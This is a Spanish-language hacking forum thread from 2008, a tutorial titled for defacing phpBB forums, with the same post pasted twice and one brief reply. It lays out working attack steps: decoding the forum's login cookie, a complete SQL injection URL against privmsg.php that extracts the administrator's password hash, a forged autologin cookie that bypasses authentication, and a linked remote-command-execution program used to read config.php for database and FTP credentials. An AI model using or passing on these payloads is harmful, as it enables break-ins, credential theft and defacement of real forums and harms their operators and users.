Deface a phpBB por cookies
2 participantes
Página 1 de 1.
Deface a phpBB por cookies
danywar1995 Mar Dic 09, 2008 12:32 am
---------------------------------------------------------------------------------------------------
******
phpBB|| RECOPILACION DE LA WEB: by danywar1995
******
Logeate en el foro (antes registrate xD), y activa la opcion de "Entrar automaticamnte con ese login"
Si tenes Mozilla FireFox (si no bajatelo, MUCHA mejor k el ie):
PASOS: 1) Anda a C:\documents and settings\TU_USER\Datos de programa\Mozilla\Firefox\Profiles\EL_K_AYA.default
2) Abri el cookies.txt con el NotePad u otro
3) Pone Edicion--->buscar: la_web_k_t_loeaste.algo
4) Anda hacia la derecha hasta k diga phpbb2mysql_data (la mayoria de veces es asi)
5) Vas a ver algo parecido a esto: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22690db5e32bfd5f28319895c38de9f546%22%3Bs%3A6%3A%22userid%22%3Bi%3A2%3B%7D
6) Esta encriptado asi k anda a: http://usuarios.lycos.es/zonahackphyro/modules.php?name=PHP-Nuke_Tools&file=index&func=URLENCODER
y pega el coso k es parecido al de arriba (borra el http:// del cuadro antes) y pone Decode
7) va a kdar +/- asi: a:2:{s:11:"autologinid";s:32:"690db5e32bfd5f28319895c38de9f546";s:6:"userid";s:1:2;}
| | |
|--->hash del pass deladmin | |
| |
Este numero corresponde a la cantidad de cifras señaladas con **SEÑAL**<------| |
|
|
**SEÑAL**
Este numero es el User_ID
8) Para sacar el hash: www.web.xxx/donde_esta_el_foro/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*
Hay varias formas mas
Podes probar con Remote Command Execution (bug k te permite ejecutar comandos en el server) o O pones como la cookie: a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"4";}
|
ACA ponel el UserID del
admin
Para saberlo: Pone "Members list" y luego pone click en el primero, tiene k decir "Site Admin"
en el Profile, luego si dice eso, fijate en la url: http://www.algo.algo/foro/......viewprofile&u=4
y ponel numero (en este caso 4) en la "formula" de arriba y encriptala con URL.
Para k practiquen hice un foro (no sean lammers y lo desctiven y/o cambien las claves)
Ya q si no otros no van a poder aprender:
Una vez k entren pongan un mensaje en el unico Board k hay k diga: "H0l4, soy tu_nombre y entre al foro como admin"
r3t0.tk o r3to.tk o ret0.tk
el mensaje ponanlo en el Board: Board
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
bajense de: thor.prohosting.com/emo8276/varios/phpBB.exe el perograma k es para "Remote Comand Execution"
Pongan en URL: la web con el foro (www.web.xxx/donde:este_el_foro)
En topic: algun tema k exista (fiense en la direccion del explorer diga www.web.xxx/donde_este_el_foro/viewtopic.php?t=1254 (en este caso es: 1254)
en comando: cualkier comando DE a 1 solo UNIX: mas conocido es ----> tail config.php (esto nos dira, si es vulnerable, el user y pass de la Base de Datos k en algunos casos es igual al de FTP (pongan ftp://user:pass@www.web.xxx))
Bueno espero k les sirva
bye
</NOSCRIPT></TITLE><SCRIPT LANGUAGE="JavaScript">
<!--Ad Banner
function popupPage() {
var windowopts = "location=no,scrollbars=no,menubars=no,toolbars=no,resizable=yes,left= 50,top=50,width=490,height=130";
popup21148 = open('/prohost/banner.html',"MenuPopup",windowopts);
popup21148.focus();
}
popupPage();
// Ad Banner-->
</script>
******
phpBB|| RECOPILACION DE LA WEB: by danywar1995
******
Logeate en el foro (antes registrate xD), y activa la opcion de "Entrar automaticamnte con ese login"
Si tenes Mozilla FireFox (si no bajatelo, MUCHA mejor k el ie):
PASOS: 1) Anda a C:\documents and settings\TU_USER\Datos de programa\Mozilla\Firefox\Profiles\EL_K_AYA.default
2) Abri el cookies.txt con el NotePad u otro
3) Pone Edicion--->buscar: la_web_k_t_loeaste.algo
4) Anda hacia la derecha hasta k diga phpbb2mysql_data (la mayoria de veces es asi)
5) Vas a ver algo parecido a esto: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22690db5e32bfd5f28319895c38de9f546%22%3Bs%3A6%3A%22userid%22%3Bi%3A2%3B%7D
6) Esta encriptado asi k anda a: http://usuarios.lycos.es/zonahackphyro/modules.php?name=PHP-Nuke_Tools&file=index&func=URLENCODER
y pega el coso k es parecido al de arriba (borra el http:// del cuadro antes) y pone Decode
7) va a kdar +/- asi: a:2:{s:11:"autologinid";s:32:"690db5e32bfd5f28319895c38de9f546";s:6:"userid";s:1:2;}
| | |
|--->hash del pass deladmin | |
| |
Este numero corresponde a la cantidad de cifras señaladas con **SEÑAL**<------| |
|
|
**SEÑAL**
Este numero es el User_ID
8) Para sacar el hash: www.web.xxx/donde_esta_el_foro/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*
Hay varias formas mas
Podes probar con Remote Command Execution (bug k te permite ejecutar comandos en el server) o O pones como la cookie: a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"4";}
|
ACA ponel el UserID del
admin
Para saberlo: Pone "Members list" y luego pone click en el primero, tiene k decir "Site Admin"
en el Profile, luego si dice eso, fijate en la url: http://www.algo.algo/foro/......viewprofile&u=4
y ponel numero (en este caso 4) en la "formula" de arriba y encriptala con URL.
Para k practiquen hice un foro (no sean lammers y lo desctiven y/o cambien las claves)
Ya q si no otros no van a poder aprender:
Una vez k entren pongan un mensaje en el unico Board k hay k diga: "H0l4, soy tu_nombre y entre al foro como admin"
r3t0.tk o r3to.tk o ret0.tk
el mensaje ponanlo en el Board: Board
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
bajense de: thor.prohosting.com/emo8276/varios/phpBB.exe el perograma k es para "Remote Comand Execution"
Pongan en URL: la web con el foro (www.web.xxx/donde:este_el_foro)
En topic: algun tema k exista (fiense en la direccion del explorer diga www.web.xxx/donde_este_el_foro/viewtopic.php?t=1254 (en este caso es: 1254)
en comando: cualkier comando DE a 1 solo UNIX: mas conocido es ----> tail config.php (esto nos dira, si es vulnerable, el user y pass de la Base de Datos k en algunos casos es igual al de FTP (pongan ftp://user:pass@www.web.xxx))
Bueno espero k les sirva
bye
</NOSCRIPT></TITLE><SCRIPT LANGUAGE="JavaScript">
<!--Ad Banner
function popupPage() {
var windowopts = "location=no,scrollbars=no,menubars=no,toolbars=no,resizable=yes,left= 50,top=50,width=490,height=130";
popup21148 = open('/prohost/banner.html',"MenuPopup",windowopts);
popup21148.focus();
}
popupPage();
// Ad Banner-->
</script>
danywar1995- Usuario Nvl. 1
- Cantidad de envíos : 13
Barra de Conexión :
Fecha de inscripción : 09/12/2008
Re: Deface a phpBB por cookies
nidip Jue Ene 01, 2009 8:41 pm
BUEN APORTE PERO EN LA ESKINA DE ABAJO DE LA DERECHA TENES ALGO PARA SUPRIMIR KOOKKIES
nidip- Usuario Nvl. 6
-
Cantidad de envíos : 82
Edad : 34
Fecha de inscripción : 01/01/2009
Página 1 de 1.
Permisos de este foro:
No puedes responder a temas en este foro.